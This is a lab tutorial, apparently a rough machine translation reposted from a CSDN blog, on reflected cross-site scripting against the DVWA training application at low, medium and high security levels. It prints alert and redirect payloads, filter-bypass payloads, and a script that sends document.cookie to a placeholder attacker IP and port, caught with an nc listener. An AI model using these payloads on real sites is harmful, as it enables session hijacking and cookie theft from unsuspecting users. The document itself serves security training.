DVWAのXSSクロスサイトスクリプティング攻撃(リフレクションタイプ)

DVWAのXSSクロスサイトスクリプティング攻撃(リフレクションタイプ)

環境と原則

環境: kali linux、dvwa、攻撃マシン(win10)、攻撃マシン(win xp)

原理

1.ポップアップ
ここに画像の説明を挿入します
2.リダイレクト
ここに画像の説明を挿入します3.Cookieを取得する
ここに画像の説明を挿入します

下層階級

1つのポップアップウィンドウ

js悪意のあるコード:

# 直接嵌入
<script>alert('xss')</script>
# 元素事件
<body onload = alert('xss')>

<img src = '' onerror = alert('xss')>

<a href = '' onclick = alert('xss')>type</a>

悪意のあるコードを挿入します。悪意のあるコード
ここに画像の説明を挿入します
が挿入されたページに戻ります。
ここに画像の説明を挿入します
攻撃された人にURLを送信します。攻撃された人はページを開き、XSSをトリガーします。
ここに画像の説明を挿入します

2、リダイレクト

js悪意のあるコード:

<script>window.location = "http://www.baidu.com"</script>

jsページに戻り、
ここに画像の説明を挿入します
ここに画像の説明を挿入します攻撃者に送信します:攻撃者がURLを開きます:
ここに画像の説明を挿入しますリダイレクトが発生します
ここに画像の説明を挿入します

3、クッキーを取得します

js悪意のあるコード:

<script>alert(document.cookie)</script>

<script src='http://xxxxx/a.js'></script>

kaililinuxの/ var / www / html /ディレクトリに.jsファイルを作成します。内容は次のとおりです。

var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;

ここに画像の説明を挿入します悪意のあるコードを挿入してページに戻り、攻撃されたマシンを使用してURLにアクセスします
ここに画像の説明を挿入します

kalil inuxを開き、nc -vnlp 88を使用してポート88を監視します
ここに画像の説明を挿入します
Cookieを返します
ここに画像の説明を挿入します

中級

ソースコード:<script>タグはフィルタリングされています。

ここに画像の説明を挿入します他のタグを使用してXSSにタッチするか、大文字と小文字を混在させてバイパスすることができます。

<sCriPt>alert('xss')</script>

二重書き込みバイパス

<sc<script>ript>alert('xss')</script>

ここに画像の説明を挿入します
成功触法:
ここに画像の説明を挿入します

高いレベル

ソースコード:<script>タグの定期的なマッチングとフィルタリング。
ここに画像の説明を挿入します
他のタグを使用してバイパスします。

<body onload = alert('xss')>

<img src = '' onerror = alert('xss')>

<a href = '' onclick = alert('xss')>type</a>

ここに画像の説明を挿入します

ここに画像の説明を挿入します
ここに画像の説明を挿入します

DVWAのXSSクロスサイトスクリプティング攻撃(DOMタイプ)

DVWAのXSSクロスサイトスクリプティング攻撃(保存されたタイプ)

おすすめ

転載: blog.csdn.net/qq_45742511/article/details/113182178